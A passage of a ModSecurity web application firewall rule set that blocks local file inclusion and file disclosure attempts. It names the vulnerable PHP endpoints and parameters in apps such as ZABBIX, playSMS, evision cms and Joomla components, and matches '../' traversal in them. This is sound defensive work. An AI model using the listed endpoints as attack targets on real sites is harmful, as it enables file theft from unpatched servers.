"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009191,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:context[path_to_root] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009393) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion SecRule REQUEST_LINE "@contains /cuenta/cuerpo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009393,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30345'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:base_archivo "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009329) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /locales.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009329,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33965'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:srclang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009661) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /artmedic_print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009661,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:date "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009790) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /arch.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009790,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34968'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:arch "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009875) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /_functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009875,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,35103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[prefix] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009436) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /123flashchat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009436,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:e107path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009224) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion SecRule REQUEST_LINE "@contains /index_inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009224,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33774'" SecRule ARGS:inc_ordner "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008849) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/3rdparty/adminpart/add3rdparty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008849,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008850) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addpolling.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/polling/adminpart/addpolling.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008850,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addpolling.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addpolling.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008851) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/contact/adminpart/addcontact.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008851,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008852) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/brandnews/adminpart/addbrandnews.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008852,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008853) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/newsletter/adminpart/addnewsletter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008853,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008854) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/game/adminpart/addgame.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008854,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008855) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/tour/adminpart/addtour.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008855,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008856) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/articles/adminpart/addarticles.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008856,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008857) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/product/adminpart/addproduct.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008857,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008858) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/plain/adminpart/addplain.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008858,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009719) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion SecRule REQUEST_LINE "@contains /modules/comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009719,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,19838'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:templates_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009720) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pHNews comments.php template Local File Inclusion SecRule REQUEST_LINE "@contains /modules/comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009720,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS pHNews comments.php template Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,19838'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:template "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pHNews comments.php template Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion SecRule REQUEST_LINE "@contains /addedit-render.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008992,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32774'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:editform/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009085) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion SecRule REQUEST_LINE "@contains /plugin/gateway/gnokii/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009085,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:apps_path[plug] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009087) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion SecRule REQUEST_LINE "@contains /plugin/themes/default/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009087,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:apps_path[themes] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009089) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion SecRule REQUEST_LINE "@contains /lib/function.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009089,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:apps_path[libs] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009320) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion SecRule REQUEST_LINE "@contains /_footer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009320,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33621'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:skin_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009331) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS tinyCMS templater.php Local File Inclusion SecRule REQUEST_LINE "@contains /templater.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009331,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS tinyCMS templater.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30785'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config[template] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS tinyCMS templater.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011573) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Plogger phpThumb.php src Parameter Remote File Disclosure Attempt SecRule REQUEST_LINE "@contains /plog-includes/lib/phpthumb/phpThumb.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011573,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Plogger phpThumb.php src Parameter Remote File Disclosure Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:src "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Plogger phpThumb.php src Parameter Remote File Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011574) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Plogger phpThumb.php w Parameter Remote File Disclosure Attempt SecRule REQUEST_LINE "@contains /plog-includes/lib/phpthumb/phpThumb.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011574,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Plogger phpThumb.php w Parameter Remote File Disclosure Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:w "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Plogger phpThumb.php w Parameter Remote File Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011572) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Plogger phpThumb.php h Parameter Remote File Disclosure Attempt SecRule REQUEST_LINE "@contains /plog-includes/lib/phpthumb/phpThumb.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011572,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Plogger phpThumb.php h Parameter Remote File Disclosure Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:h "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Plogger phpThumb.php h Parameter Remote File Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011563) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DynPage dynpage_load.php file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /content/dynpage_load.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011563,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS DynPage dynpage_load.php file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DynPage dynpage_load.php file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011562) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /oldnews_reader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011562,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011554) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011554,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jphone" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011385) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011385,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_noticeboard" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011453) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /maincore.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011453,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET 